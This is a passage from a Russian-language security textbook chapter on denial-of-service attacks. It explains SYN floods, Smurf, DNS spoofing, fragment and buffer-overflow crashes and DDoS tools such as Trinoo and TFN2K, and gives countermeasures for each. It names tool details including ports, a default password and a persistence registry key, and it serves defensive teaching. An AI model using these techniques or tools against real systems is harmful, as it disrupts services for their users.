    Для того чтобы обеспечить такую же защиту в системе Linux, необходимо активизировать функции брандмауэра на уровне ядра с помощью утилиты ipfw. Убедитесь, что эти требования учтены при компиляции ядра и выполните следующие команды

    ipfwadm -I -a deny -Р icmp -D 10.10.10.0 -S О/О 0 8
    ipfwadm -I -a deny -Р icmp -D 10.10.10.255 -S О/О 0 8

    При этом не забудьте заменить строку 10.10.10.0 своим сетевым адресом, а 10.10.10.255 — сетевым широковещательным адресом.

    FreeBSD



    Система FreeBSD версии 2.2.5 и выше запрещает обработку направленных широковещательных запросов по умолчанию. Этот режим можно активизировать или отключить, изменив параметр sysctl в файле net. inet. icmp. bmcastecho.

    AIX



    Система AIX 4.x запрещает генерировать ответные сообщения на широковещательные запросы по умолчанию. Для переключения этого режима можно воспользоваться командой по с параметром bcastping. Эта команда служит для настройки сетевых атрибутов в выполняющемся ядре. Данные атрибуты должны устанавливаться при каждом запуске системы.

    Все версии системы UNIX



    Для того чтобы предотвратить генерацию узлами сообщений в ответ на атаку Fraggle, отключите службы echo и chargen в файле /etc/inetd/conf, поместив в начало соответствующих строк символ #.


    9. Узлы под воздействием атак



    Узлы под воздействием атак


    Конечно, очень важно понимать, как предотвратить возможность использования узла в качестве усилителя атаки, однако еще важнее разобраться в том, как определить, что узел уже используется для этих целей. Как упоминалось в предыдущих главах, нужно ограничить возможность поступления данных ICMP и UDP лишь заданных типов и только на требуемые узлы. Причем это нужно обеспечить на пограничных маршрутизаторах. Естественно, такая мера не позволит защититься от атак Smurf и Fraggle, приводящих к насыщению полосы пропускания. Гораздо лучше обратиться к провайдеру услуг Internet и совместными усилиями максимально ограничить входящий трафик ICMP. Эти защитные меры можно усилить с помощью режима CAR (Committed Access Rate — допустимая частота обращений), который можно установить на устройствах Cisco IOS 1.1СС, 11.ICE и 12.0. Это позволит ограничить трафик ICMP некоторой разумной величиной, например 256 или 512 Кбайт.
    Обнаружив, что узел задействован в атаке, нужно сразу же связаться с сетевым центром провайдера услуг Internet. He забывайте, что выявить источник атаки трудно, но все же возможно. Для этого в процессе тесного сотрудничества с провайдером понадобится тщательно исследовать уязвимый узел, поскольку именно он является получателем ложных пакетов. Помните о том, что если узел принимает участие в атаке, то генерируемые им пакеты ничем не отличаются от остальных сетевых пакетов.
    Систематизированный анализ каждого маршрута в обратном направлении, начинающийся с усиливающего узла, позволит выявить сеть, из которой была предпринята атака. При этом понадобится отслеживать каждый сегмент пути, пройденный ложным пакетом. Для автоматизации этого процесса группа специалистов по вопросам безопасности MCI разработала сценарий dostracker на языке Perl, который после помещения на маршрутизаторе Cisco сразу же приступит к отслеживанию маршрута в обратном направлении вплоть до выявления источника атаки. К сожалению, эта программа окажется гораздо менее полезной, если у вас нет доступа ко всем маршрутизаторам, задействованным в атаке.
    Мы также рекомендуем обратиться к документу RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks Which Employ IP Source Address Spoofing (Фильтрация сетевых вторжений: защита от атак DoS с применением ложных исходных IP-адресов), авторами которого являются Пауль Фергюсон (Paul Ferguson) из компании Cisco Systems и Даниель Сени (Daniel Senie) из компании Blazenet, Inc.

    Атака с помощью переполнения пакетами SYN



    До того как атака Smurf не стала такой популярной, наиболее разрушительной считалась атака с помощью переполнения пакетами SYN. Упоминавшаяся в начале этой главы атака на компанию PANIX является прекрасным примером реализации такой атаки. Давайте подробно разберемся с тем, что же происходит в этом случае.
    Как уже упоминалось, инициализация соединения TCP представляет собой процесс, состоящий из трех шагов (рис. 12.1).



    Рис. 12.1. Соединение SYN

    В обычной ситуации пакет SYN отсылается с определенного порта системы А на конкретный порт системы в, который находится в состоянии LISTEN. В этот момент потенциальное соединение системы в находится в состоянии SYN_RECV. На этой стадии система в передает системе А пакет SYN/ACK. Если процесс проходит нормально, система А передает обратно пакет АСК и соединение переходит в состояние ESTABLISHED.
    Описанный механизм прекрасно работает в большинстве случаев, однако некоторые из его изъянов позволяют взломщику сгенерировать условие DoS. Проблема заключается в том, что большинство систем заранее выделяет некоторое количество ресурсов при установке потенциального (potential) соединения, т.е. соединения, которое еще не полностью установлено. Несмотря на то что многие системы могут поддерживать тысячи параллельных соединений с определенным портом (например, 80), достаточно дюжины или около того потенциальных запросов на соединение, чтобы израсходовать все доступные ресурсы. Именно этот механизм и применяется взломщиком для атаки с помощью переполнения пакетами SYN.
    В начале атаки SYN взломщик тоже передает пакет SYN с системы А системе В, однако при этом в качестве исходного адреса указывает ложный адрес несуществующего узла. После этого система А посылает пакет SYN/ACK по ложному адресу. Если узел по этому адресу существует, то системе В обычно обратно отсылается пакет RST, поскольку этот узел не инициировал установку соединения. Однако не забывайте о том, что взломщик наверняка выбрал недостижимую систему. Следовательно, после того, как система в отправила пакет SYN/ACK, она никогда не получит ответного пакета RST от системы А. Это потенциальное соединение останется в состоянии SYN_RECV и будет помешено в очередь на установку соединения. Из этой очереди потенциальное соединение может быть удалено лишь после истечения выделенного промежутка времени. Этот промежуток времени в каждой системе различен, однако он не может быть меньше 75 секунд, а в некоторых реализациях протокола IP минимальный интервал может достигать 23 минут. Поскольку очередь на установку соединения обычно имеет небольшой размер, взломщику достаточно отправить несколько пакетов SYN с интервалом 10 секунд, чтобы полностью заблокировать определенный порт.
    У вас, очевидно, уже давно возник вопрос: "А почему эта атака является такой разрушительной"? Во-первых, для ее успешной реализации достаточно небольшой полосы пропускания. Для нарушения работоспособности промышленного Web-сервера злоумышленнику достаточно модемной линии связи 14.4 Кбит/с. Во-вторых, подобная атака является скрытой, поскольку взломщики при рассылке пакетов SYN используют ложный исходный адрес. Это значительно затрудняет идентификацию источника нападения. По иронии судьбы эта атака уже несколько лет назад была предсказана многими экспертами по вопросам безопасности.

    Контрмеры: защита от атак с использованием пакетов SYN



    Чтобы определить, подвержена ли атаке ваша система, можно воспользоваться командой netstat, если она поддерживается операционной системой. Многочисленные соединения в состоянии SYN_RECV свидетельствуют о том, что именно в этот момент проводится атака.
    Далее приводятся четыре основных способа защиты от атак с использованием пакетов SYN. Хотя каждый из подходов имеет свои достоинства и недостатки, все они способны снизить воздействие сфокусированной атаки SYN. Не забывайте о сложности выявления злоумышленника, поскольку он использует ложный исходный адрес. Однако в решении этой задачи может помочь утилита dostracker группы MCI (если вы имеете доступ к маршрутизаторам каждого сегмента пути).

    Увеличение размера очереди на установку соединений



    Несмотря на то что стек протокола IP каждым производителем реализуется по-своему, вполне возможно настроить размер очереди на установку соединений таким образом, чтобы нейтрализовать воздействие атаки с использованием пакетов SYN. Это полезное, однако не самое оптимальное решение, поскольку его реализация требует дополнительных системных ресурсов, а это может сказаться на общей производительности.

    Уменьшение периода ожидания установки соединения



    Сокращение интервала ожидания установки соединения также поможет снизить влияние атаки. Тем не менее, это тоже не самое оптимальное решение проблемы.

    Использование пакетов обновления программного обеспечения и защита от потенциальных атак SYN



    Как следует из названия подраздела, большинство современных операционных систем имеет встроенные механизмы выявления и предотвращения атак с использованием пакетов SYN. Для получения перечня таких операционных систем и соответствующих модулей обновления читайте отчет СА-96:21 группы CERT TCP SYN Flooding and IP Spoofing Attacks.
    Поскольку атаки SYN получили в глобальной сети широкое распространение, были разработаны и другие решения проблемы атак DoS. Например, современное ядро системы Linux версии 2.0.30 и более поздних версий имеет режим SYN cookie. Если этот режим включен, ядро будет выполнять выявление и регистрацию возможных атак SYN. После этого будет использоваться криптографический протокол, известный под названием SYN cookie, который позволит легитимным пользователям устанавливать соединение даже в процессе предпринятой атаки.
    В других операционных системах, например Windows NT с установленным сервисным пакетом SP2 или более поздними, реализован динамический механизм выделения ресурсов (см. статью базы данных Microsoft Q142641). Когда длина очереди на установку соединений достигает некоторого предопределенного порога, система автоматически выделяет дополнительные ресурсы. Так что очередь никогда не будет переполнена.

    Использование сетевых систем IDS



    Некоторые системы IDS уровня сети могут обнаруживать и активно противодействовать атакам SYN. Такие атаки можно обнаружить по возросшему потоку пакетов SYN, который не сопровождается потоком ответных сообщений. Система выявления вторжений может передать системе, используемой в процессе атаки, пакет RST, соответствующий начальному запросу SYN. Это будет способствовать восстановлению корректного состояния очереди на установку соединений.

    Атаки DNS



    В 1997 году группа специалистов по вопросам безопасности Secure Networks, Inc. (SNI), которая в настоящее время называется Network Associates, Inc. (NAI), опубликовала отчет о различных изъянах реализации BIND (Berkeley Internet Name Domain) системы DNS (NAI-0011, BIND Vulnerabilities and Solutions). Версии BIND до 4.9.5.+Р1 могут кэшировать фиктивную информацию, если активизирован режим рекурсии. Этот режим позволяет серверу имен обрабатывать запросы на получение данных о зонах и доменах, которые он не обслуживает. Когда серверу имен приходит запрос на получение информации о неизвестной зоне или домене, он перенаправляет запрос авторизованному серверу имен этого домена. После получения ответа от этого сервера первый сервер имен передает полученные данные обратно узлу, сгенерировавшему запрос.
    К сожалению, если режим рекурсии активизирован в уязвимых версиях BIND, взломщик может модифицировать буфер сервера имен, выполняющего рекурсивный поиск. Эта ситуация известна как обман записи PTR (PTR record spoofing). При этом атака направлена на процесс преобразования IP-адресов в имена узлов. Несмотря на то что атака основывается на использовании доверительных отношений между узлами, все же сохраняется возможность генерации условия DoS системы DNS. Например, взломщик может попробовать "убедить" целевой сервер имен поместить в свой буфер данные, отображающие имя www.abccompany.com в несуществующий адрес 0.0.0.10. Когда пользователи уязвимого сервера имен попробуют обратиться к узлу www. abccompany.com, то им никогда не удастся получить ответ с узла 0.0.0.10. Это приведет к генерации состояния DoS на узле www.abccompany.com.

    Контрмеры: защита службыDNS



    Для разрешения проблем службы BIND обновите ее версию до 4.9.6 или 8.1.1 и выше. Поскольку изъян многих версий BIND связан с возможностью повреждения буфера, лучше всего обновить ее используемую версию до самой последней, в которой реализованы дополнительные средства зашиты. Для получения более подробной информации по этому вопросу обращайтесь по адресу http://www.isc.org/bind.html. Информацию о модулях обновления можно найти в отчете СА-97.22 BIND — the Berkeley Internet Name Daemon.


    2.gif

    Изображение: 

    10. Атаки DoS систем UNIX и Windows NT



    Атаки DoS систем UNIX и Windows NT


    Последние двадцать лет популярность системы UNIX неустанно возрастает. И это абсолютно закономерно, поскольку эта система обладает мощью, элегантностью и позволяет выполнять самые невероятные задачи. В то же время эти же преимущества иногда могут послужить причиной возникновения некоторых проблем. В течение многих лет были выявлены сотни условий DoS в различных версиях системы UNIX.
    Как и UNIX, система Windows NT быстро набрата популярность в корпоративном мире США. Многие организации в процессе управления своей коммерческой деятельностью делают ставку именно на Windows NT. Несмотря на то что в настоящее время ведутся споры о том, какая из операционных систем является более мощной, не у кого не вызывает сомнения тот факт, что Windows NT представляет собой сложную систему, предоставляющую возможность выполнения самых разнообразных функций. Как и в случае системы UNIX, эти широкие возможности позволяют взломщикам генерировать состояние DoS в самой системе NT и в связанных с ней приложениях.
    Большую часть атак DoS можно разделить на две категории: удаленные и локальные. В каждой из этих категорий можно выделить множество методов генерации этого состояния. Поэтому каждый рассматриваемый пример будет демонстрировать теоретические основы таких атак, а не подробное описание самих атак. Каждый конкретный способ реализации с течением времени претерпевает изменения. Однако если вы знакомы с теоретическими основами проведения атак определенного типа, то эти знания можно без проблем применить и в новых условиях. Давайте приступим к рассмотрению основных условий DoS из каждой категории.


    11. Удаленные атаки DoS



    Удаленные атаки DoS


    В настоящее время большинство условий DoS связано с ошибками в программировании, которые имеют отношение к реализации стека IP различными разработчиками. Как упоминалось в главе 2, каждый разработчик реализует стек IP по-разному. Поскольку реализация стека является достаточно сложной задачей, решение которой постоянно эволюционирует, то всегда имеется большая вероятность появления самых разнообразных ошибок. В основе многих атак лежит возможность передачи пакета или последовательности пакетов на целевой узел и использование определенного изъяна программного обеспечения. После того как эти пакеты будут получены целевой системой, могут возникать самые различные ситуации, начиная с некорректной обработки поступивших пакетов до краха всей системы в целом.

    Перекрытие фрагментов пакетов IP



    Эти атаки связаны с изъянами в программном коде определенной реализации стека IP, который используется для восстановления пакетов. Когда пакеты проходят через различные сети, может оказаться необходимым разделить эти пакеты на меньшие части (фрагменты), размер которых определяется заданным в сети значением MTU (Maximum Transmission unit — максимальная единица передачи). Такая атака была характерна для старых версий ядра системы Linux, в котором некорректно обрабатывались перекрывающиеся IP-фрагменты. Хотя ядро Linux и следит за тем, чтобы фрагменты не превышали максимально допустимого размера, такая проверка не выполняется для слишком малых фрагментов. Таким образом, тщательно сконструированные пакеты после их отправки системе Linux могут привести к ее перезагрузке или останову функционирования. Linux является далеко не единственной системой, которая уязвима для таких атак. Системы Windows NT/95 также могут подвергаться подобным нападениям (newtear.c, syndrop.c, boink.c).

    Контрмеры



    Ошибки, используемые в описанных выше атаках, были исправлены в более поздних версиях ядра 2.0.x и 2.2.x. Для обеспечения защиты обновите ядро операционной системы до версии 2.0.x или 2.2.x. В этих версиях исправлен не только алгоритм восстановления фрагментов IP-пакетов, но и многие другие ошибки подсистемы защиты.
    Для системы Windows NT изъян фрагментации был исправлен в сервисном пакете Service Pack 3 и более поздних модулях обновления. Пользователи Windows 95 также должны установить соответствующие сервисные пакеты. 

    Утечка памяти в Windows NT -именованные каналы поверх RPC



    В системе Windows NT возможна утечка памяти, управляемой файлом spoolss.exe, позволяющая неавторизованному пользователю подсоединиться к ресурсу \\server\ PIPEXSPOOLSS и захватить всю доступную память целевой системы. Ситуация усугубляется еще и тем, что эту атаку можно реализовать через нулевое соединение даже в том случае, когда в системном реестре установлено значение RestrictAnonymous. Для полного и скрытого захвата всех ресурсов может потребоваться некоторое время, поэтому деятельность вхтомшика может оказаться довольно продолжительной.

    Контрмеры: предотвращение утечки памяти



    Для предотвращения этой атаки через нулевое соединение нужно удалить параметр SPOOLSS, расположенный в поддереве системного реестра HKLM\System\CCS\ Services\LanmanServer\ Parameters\NullSessionPipes (REG_MULTI_SZ). Однако не забывайте, что эта мера не позволит обезопасить систему от проведения атаки авторизованными пользователями.

    Переполнение буфера в FTP-сервере IIS



    Как вы узнали из главы 8, атаки с использованием переполнения буфера чрезвычайно эффективны при нарушении зашиты уязвимых систем. Кроме того, переполнение буфера оказывается эффективным также для создания условия DoS. Если в результате переполнения буфера не удалось получить привилегии администратора, то в большинстве случаев его можно использовать для того, чтобы удаленно вызвать крах уязвимого приложения.
    От переполнения буфера не защищена служба FTP, входящая в состав Internet Information Server (IIS 3.0 и 4.0). При использовании команды list удаленные пользователи могут удаленно вызвать крах сервера. Эта команда становится доступной лишь после успешного завершения аутентификации, однако анонимные FTP-пользователи могут без проблем ее использовать. Важно не забывать об опасности, возникающей при возникновении условия DoS. Степень риска значительно возрастает, если у взломщика имеется возможность выполнить на целевом узле произвольный код, воспользовавшись условием переполнения буфера.

    Контрмеры: защита от переполнения буфера в RP-сервере IIS



    Описанную проблему позволяют устранить сервисный пакет SP5 и модули обновления, выпушенные компанией Microsoft после появления сервисного пакета SP4
    (ftp://ftp.microsoft.com/bussYS/iis/iis-public/fixes/usa/security/ftpls-fix/).

    Атаки stream и raped



    Программа stream, с (неизвестного автора) и raped.с, написанная Ликвидом Стилом (Liquid Steel), появились в начале 2000 года. С их использованием можно осуществить две похожие друг На друга простые атаки, которые, несмотря на это, будут очень эффективными.
    Обе атаки направлены на захват ресурсов, в результате чего операционная система становится неспособной управлять всеми пакетами, отправленными ей одновременно. Изначально программы stream и raped были предназначены для атак на систему FreeBSD, однако в настоящее время их можно использовать для нарушения работы многих операционных систем, включая (но не ограничиваясь) Windows NT. Признаком нападения служит увеличение нагрузки на центральный процессор (см. рисунок ниже), однако после прекращения атаки система возвращается к своему обычному состоянию. Программа stream.с передает TCP-пакеты дек группе портов с произвольно выбранными номерами и случайным образом заданными исходными IP-адресами. В процессе атаки raped отправляются TCP-пакеты АСК, в которых указан ложный исходный IP-адрес.


    Контрмеры: защита от атак stream и raped



    К сожалению, для защиты от таких атак модули обновления выпущены лишь для некоторых операционных систем. Нам неизвестно о каких-либо модулях обновления Windows NT. Однако в системе FreeBSD можно воспользоваться неофициальным модулем, который можно получить по адресу http: //www. freebsd.org/~alfred/tcp_fix.diff.

    Атака на сервер ColdFusion



    Эта атака была исследована в июне 2000 года компанией Foundstone. Она основана на ошибке программы и позволяет нарушить функционирование сервера. Условие DoS возникает в процессе конвертирования введенного и хранящегося паролей в форму, пригодную для их сравнения, когда введенный пароль имеет очень большой размер (более 40000 символов). Воспользоваться этим приемом очень просто. Для получения более подробной информации читайте главу 15.

    Контрмеры



    Подробные рекомендации по устранению этого изъяна приведены в главе 15, "Хакинг в Web".


    3.gif

    Изображение: 

    12. Распределенные атаки DoS



    Распределенные атаки DoS


    В сентябре 1999 года в момент появления первого издания этой книги концепция распределенных атак DoS была не более чем предположением. А сейчас разговор о компьютерах без упоминания фразы "распределенная атака DoS" (DDoS — Distributed Denial of Service) можно считать неполным. Как и вирусы, появляющиеся в Internet как сорная трава, атаки DDoS привлекают все большее внимание средств массовой информации.
    В феврале 2000 года была предпринята первая массированная атака DDoS. Сначала ей подвергся Web-сервер Yahoo, а затем E*TRADE, eBay, buy.com, CNN.com и другие серверы. В результате было нарушено функционирование семи всем известных Web-узлов. Некоторые склонны считать, что эта атака была инициирована группой опытных хакеров, которые решили удовлетворить свои низменные желания за счет простых пользователей Internet, однако это не совсем так. Верно как раз обратное.
    Атака DoS начинается в том случае, когда кто-либо (обычно скуки ради) воспользовался каким-либо свободно распространяемым программным обеспечением и отправил большое количество пакетов в определенную сеть или узел, чтобы завладеть его ресурсами. Однако в случае распределенной атаки DoS ее источником является несколько узлов. Этот сценарий можно реализовать лишь одним способом: взломав существующие в Internet системы.
    Первый шаг любого взломщика, решившего прибегнуть к атаке DDoS, заключается во взломе максимального количества узлов и получении на них административных привилегий. Эта задача обычно выполняется с помощью специальных сценариев, используемых для выявления потенциально уязвимых узлов. На протяжении всей книги постоянно рассматривались методы, с использованием которых взломщик может разработать такие сценарии. С их помощью можно просканировать многочисленные сети и найти в них плохо сконфигурированные узлы или уязвимое программное обеспечение, с помощью которого можно получить неограниченный доступ.
    После получения необходимых привилегий взломщик загрузит специальное программное обеспечение, предназначенное для реализации атаки DDoS, а затем запустит его. После этого большинство серверов DDoS (или демонов) ожидают поступления определенных команд. Это позволяет взломщику сначала разместить требуемые программы, а затем ждать удобного момента, чтобы приступить к нападению.
    Ниже представлен весь ход типичной атаки, начиная с "захвата" нескольких узлов и заканчивая ее завершающей стадией.
    Количество средств, предназначенных для проведения атак DDoS, увеличивается ежемесячно, так что представить их полный обзор невозможно. Поэтому в следующих разделах мы ограничимся рассмотрением лишь основных инструментов: TFN, Trinoo, Stacheldraht, TFN2K и WinTrinoo. Конечно, появляются и другие средства DDoS, такие как Shaft  и mStreams, однако они основываются на вышеупомянутых программах.


    TFN



    Пакет TFN (Tribe Flood Network), разработанный хакером Микстером (Mixter), является первым общедоступным средством реализации атаки DDoS, который предназначен для использования в системе UNIX. В состав пакета входит как клиентский, так и серверный компонент. Это позволяет взломщику установить серверную часть на удаленном взломанном узле, а затем с помощью нескольких команд, введенных с использованием клиентной части, инициировать полномасштабную распределенную атаку DoS. С помощью пакета TFN можно реализовать атаки с использованием ICMP-, UDP-пакетов, пакетов SYN, а также атаку Smurf. Помимо этих компонентов, в состав пакета TFN входит модуль, позволяющий получить доступ к удаленной командной оболочке, связанной с TCP-портом.
    Для получения более подробной информации о пакете TFN прочтите статью Дэйва Дитгриха (Dave Dittrich)ю

    Контрмеры


    Обнаружение



    Для выявления атак TFN существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper от группы Razor  и find_ddos, разработанный центром NIPC (National Infrastructure Protection Center).

    Предотвращение



    Конечно, наилучшая зашита компьютеров от использования в качестве "зомби" заключается в предотвращении их взлома на начальной стадии атаки. Это означает, что нужно реализовать все шаги, описанные в главе 8: ограничьте использование служб, установите модули обновления операционной системы и приложений, задайте адекватные разрешения на использование каталогов и файлов, а также воспользуйтесь всеми другими рекомендациями.
    Вот еще одна превентивная мера, которая позволит защититься от применения пакета TFN. Поскольку соединения TFN основаны на использовании сообщений ICMP. можно запретить весь входящий трафик ICMP.
    Для того чтобы предотвратить ваши компьютеры от их использования в качестве "зомби", реализуйте также некоторые правила фильтрации пакетов на пограничном маршрутизаторе. Обеспечьте фильтрацию пакетов ICMP, чтобы ограничить возможность применения атак Smurf. Аналогичные функции имеются и в операционной системе IOS 12.0 компании Cisco. В системе IOS 12.0 настройте механизм СВАС (Context Based Access Control — средства управления доступом на основе контекста), чтобы уменьшить риск применения атак SYN.

    Trinoo



    Как и TFN, в состав пакета Trinoo входит программа удаленного управления (клиент), которая взаимодействует с основной программой, передающей команды программе-демону (серверу). Взаимодействие между клиентом и основной программой осуществляется посредством соединения через TCP-порт 27665. При этом обычно используется пароль betaalmostdone. Связь основной программы с сервером устанавливается через UDP-порт 27444, а в обратном направлении — через LJDP-порт 31335.
    Для получения более подробной информации о пакете Trinoo читайте аналитическую статью Дэйва Диттриха.

    Контрмеры: защита от использования пакета Тrinоо


    Обнаружение



    Для выявления атак Trinoo существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра, Zombie Zapper от группы Razor () и find_ddos , разработанный центром NIPC (National Infrastructure Protection Center).

    Предотвращение



    Как и в случае пакета TFN, наилучшая зашита состоит в применении всех рекомендаций, приведенных в главе 8.
    Для того чтобы предотвратить нападение на ваши компьютеры узлов-зомби, реализуйте правила фильтрации на пограничных маршрутизаторах. Обеспечьте фильтрацию пакетов ICMP, чтобы ограничить возможность применения атак Smurf. Аналогичные функции имеются и в операционной системе IOS 12.0 компании Cisco. В системе IOS 12.0 настройте механизм СВАС, чтобы уменьшить риск применения атак SYN.

    Stacheldraht



    Пакет Stacheldraht комбинирует возможности Тrinоо и TFN и является мощным деструктивным средством, реализующим зашифрованный сеанс telnet между главным и подчиненным модулем. Теперь взломщик может блокировать системы выявления вторжений и благодаря этому получать неограниченные возможности по генерации условия DoS. Как и TFN, пакет Stacheldraht предоставляет возможность инициирования ICMP-, UDP-, SYN- и Smurf-атак. Взаимодействие клиента с сервером осуществляется через комбинацию TCP- и ICMP-пакетов ECHO REPLY.
    При взаимодействии клиента с сервером применяется алгоритм симметричного шифрования с помощью ключа. Кроме того, по умолчанию активизирован режим защиты с помощью пароля. Стоит упомянуть еще одну дополнительную возможность пакета Stacheldraht: при необходимости взломщик может обновить серверный компонент с использованием команды rср.
    Для получения дополнительных сведений обратитесь к статье Дэйва Диттриха.

    Контрмеры


    Обнаружение



    Для выявления атак Stacheldraht существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper от группы Razor  и find_ddos, разработанный центром NIPC (National Infrastructure Protection Center).

    Предотвращение



    Как и ранее, лучше всего предотвратить использование компьютеров в качестве "зомби". Это означает, что необходимо учесть все рекомендации, приведенные в главе 8, т.е. ограничить использование служб, установить модули обновления операционной системы и приложений, задать необходимые разрешения на использование файлов/каталогов и т.д.
    Другая превентивная мера аналогична приведенной в разделе, посвященному пакету TFN. Поскольку взаимодействие компонентов Stacheldraht осуществляется посредством пакетов ICMP, можно полностью запретить входящий трафик сообщений IСМР.
    Для того чтобы предотвратить нападение на ваши компьютеры со стороны узлов-зомби, реализуйте правила фильтрации на пограничных маршрутизаторах. Обеспечьте фильтрацию пакетов ICMP, чтобы ограничить возможность применения атак Smurf. Аналогичные функции имеются и в операционной системе IOS 12.0 компании Cisco. В системе IOS 12.0 настройте механизм СВАС, чтобы уменьшить риск применения атак SYN.

    TFN2K



    Аббревиатура TFN2K — это обозначение пакета TFN 2000. который является преемником пакета TFN, разработанного хакером Микстером (Mixter). Это одно из самых последних средств DDoS, которое принципиально отличается от своего предшественника и позволяет в процессе взаимодействия использовать порты с произвольно выбранными номерами. Благодаря этому можно обойти блокирование портов на пограничных маршрутизаторах. Как и TFN, пакет TFN2K поддерживает SYN-, UDP-, ICMP- и Smurf-атаки. а, кроме того, позволяет случайным образом переключаться между различными методами проведения атаки. Однако в отличие от алгоритма шифрования, используемого в пакете Stacheldraht, в TFT2K применяется более слабый алгоритм Base 64.
    Глубокий анализ TFN2K был выполнен Ясоном Барлоу (Jason Barlow) и Вуди Сроувером (Woody Thrower) из группы экспертов AXENT. 

    Контрмеры


    Обнаружение



    Дта выявления атак TFN2K существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper or группы Razor и find_ddos , разработанный центром N1PC (National Infrastructure Protection Center).

    Предотвращение



    Как и ранее, лучше всего предотвратить использование компьютеров в качестве "зомби". Это означает, что необходимо учесть все рекомендации, приведенные в главе 8, т.е. ограничить использование служб, установить модули обновления операционной системы и приложений, задать необходимые разрешения на использование файлов/каталогов и т.д.
    Для того чтобы предотвратить нападение на ваши компьютеры узлов-"зомби", реализуйте правила фильтрации на пограничных маршрутизаторах. Обеспечьте фильтрацию пакетов ICMP, чтобы ограничить возможность применения атак Smurf. Аналогичные функции имеются и в операционной системе IOS 12.0 компании Cisco. В системе 1OS 12.0 настройте механизм СВАС, чтобы уменьшить риск применения атак SYN.

    WinTrinoo



    Широкой общественности программа WinTrinoo впервые была представлена группой Razor. Это версия пакета Trinoo, предназначенная для использования в системе Windows. Это средство представляет собой программу типа "троянский конь", которая обычно называется service, ехе (если не была переименована) и имеет размер 23,145 байт.
     Не путайте имя service.exe с именем во множественном числе services.exe
    После запуска этого исполняемого файла в системный реестр Windows будет добавлен новый параметр, после чего его автоматический запуск будет выполняться при каждой перезагрузке компьютера.
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run System Services: REG_SZ: service.exe
    Конечно, это значение будет корректно интерпретироваться, если файл service.exe будет находиться в требуемом каталоге. Программа WinTrinoo прослушивает TCP- и UDP-порт 34555.

    Контрмеры



    Для того чтобы выявить программу WinTrinoo, нужно проверить сеть на предмет открытого порта с номером 34555 или выполнить поиск файла с именем service. ехе (если он не был переименован) размером 23,145 байт. Кроме такого "ручного" способа можно воспользоваться также антивирусной программой Norton Antivirus компании Symantec, которая автоматически изолирует этот файл еше до его запуска.


    4.gif

    Изображение: 

    13. Локальные атаки DoS



    Локальные атаки DoS


    Несмотря на то что удаленные атаки DoS получили большее распространение, локальные атаки тоже способны принести немало бед. Существует множество многопользовательских систем, в которых атаку DoS может инициировать авторизованный пользователь. Большинство локальных атак основано на захвате ресурсов или на использовании изъянов в программном обеспечении и направлено на то, чтобы запретить доступ легитимным пользователям. В системах NT и UNIX существуют сотни возможностей реализации локальных атак DoS, однако мы познакомимся с захватом ресурсов и использованием ошибок в программном обеспечением для систем Windows NT и UNIX соответственно.

    Терминальный сервер Windows NT и процесс proquota. ехе



    Классическим примером атаки, направленной на захват ресурсов, является использование свободного дискового пространства сверх выделенной квоты. Если функции квотирования дискового пространства в мире UNIX давно ни у кого не вызывают удивления, то в системе Windows NT эта возможность является относительно новой. Терминальный сервер Windows NT позволяет обычному пользователю применить функцию квотирования дискового пространства и заполнить системный диск (%systemdrive%). После этого пользователи, у которых отсутствует кэшированный профиль доступа, не смогут обратиться к системе. В процессе этой атаки пользователи, у которых превышена дисковая квота, не смогут завершить свою работу. Однако для того, чтобы обойти это ограничение, можно удалить процесс proguota. ехе. Это можно осуществить, поскольку владельцем этого процесса является пользователь, а не системная учетная запись.

    Контрмеры



    Практика подсказывает, что системные файлы и пользовательские данные лучше всего хранить в разных разделах. Эта аксиома как нельзя лучше подходит к приведенному примеру. Переменная %systemdrive% должна указывать на другой диск, а не на тот, на котором хранятся данные пользователей. Кроме того, поместите профили на незагружаемом разделе и используйте их только при необходимости.

    Паника ядра



    В ядре системы Linux версии 2.2.0 появлялась потенциальная возможность для возникновения условия DoS, если программа idd, используемая для печати зависимостей совместно используемых библиотек, применялась для печати определенных файлов ядра. Этот изъян был связан с вызовом функции munmap (), используемой для отображения файлов или устройств в оперативную память. При определенных обстоятельствах функция munmap () могла перезаписать важные области памяти, используемые ядром, и вызвать в системе панику и ее перезагрузку. Хотя такая ситуация не выглядит необычной, она все же иллюстрирует основную концепцию, на которой основано большинство направленных на ядро атак. В большинстве случаев непривилегированный пользователь может воспользоваться изъяном в программном обеспечении и повредить важную область памяти, применяемую ядром. Конечным результатом подобной деятельности практически всегда является паника ядра (panic kernel).

    Контрмеры против паники ядра



    Модуль обновления, позволяющий заделать эту брешь в программном обеспечении, был встроен в ядро версии 2.2.1. Практически ничего нельзя сделать для исправления ошибок в операционной системе и связанных с ней компонентах, таких как ядро, если их исходный код остается недоступным. Однако во многих свободно распространяемых версиях системы UNIX вполне возможно проверить исходный код и при необходимости внести изменения.


    14. Резюме



    Резюме


    Как вы убедились при чтении этой главы, существует много типов атак DoS, с использованием которых злоумышленники могут нарушить функционирование различных служб. Атаки, направленные на насыщение полосы пропускания, являются наиболее жестокими из-за их способности захвата трафика. Атаки с захватом ресурсов уже используются многие годы, и взломщики продолжают применять их с большим успехом. Бреши в программном обеспечении особенно популярны у взломщиков, поскольку сложность реализации стека протокола IP и связанных с ним программ постоянно повышается. И наконец, атаки DNS чрезвычайно эффективны при использовании унаследованных изъянов важнейших служб, являющихся фундаментом Internet. Фактически, некоторые эксперты по вопросам безопасности считают, что теоретически вполне возможно инициировать атаку DoS против самой сети internet, если через протокол BGP воспользоваться данными о маршрутах. Этот протокол интенсивно применяется большинством магистральных провайдеров.
    Стремительно возрастает популярность распределенных атак DoS. поскольку необходимые для этого средства становятся абсолютно доступны и для их использования не требуется никаких особых знаний. Эти атаки являются наиболее разрушительными, так как при этом быстро "захватываются" даже большие узлы Internet, которые становятся абсолютно неработоспособными.
